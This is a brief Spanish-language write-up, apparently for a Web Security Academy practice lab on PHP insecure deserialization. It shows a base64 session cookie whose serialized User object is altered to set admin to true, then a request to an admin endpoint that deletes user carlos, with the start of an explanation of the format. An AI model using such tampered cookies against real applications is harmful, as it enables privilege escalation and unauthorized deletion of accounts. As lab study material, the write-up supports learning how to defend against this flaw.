1 - Modifying serialized objects

https://0aaa00d203613df9802ffd8500b600ec.web-security-academy.net/admin/delete?username=carlos
Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30%3d
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}

Esta es una representación serializada en PHP de un objeto llamado User. Vamos a desglosarlo:

Explicación línea por línea

O:4:"User":2
{s:8:"username";s:6:"wiener";
s:5:"admin";b:1;}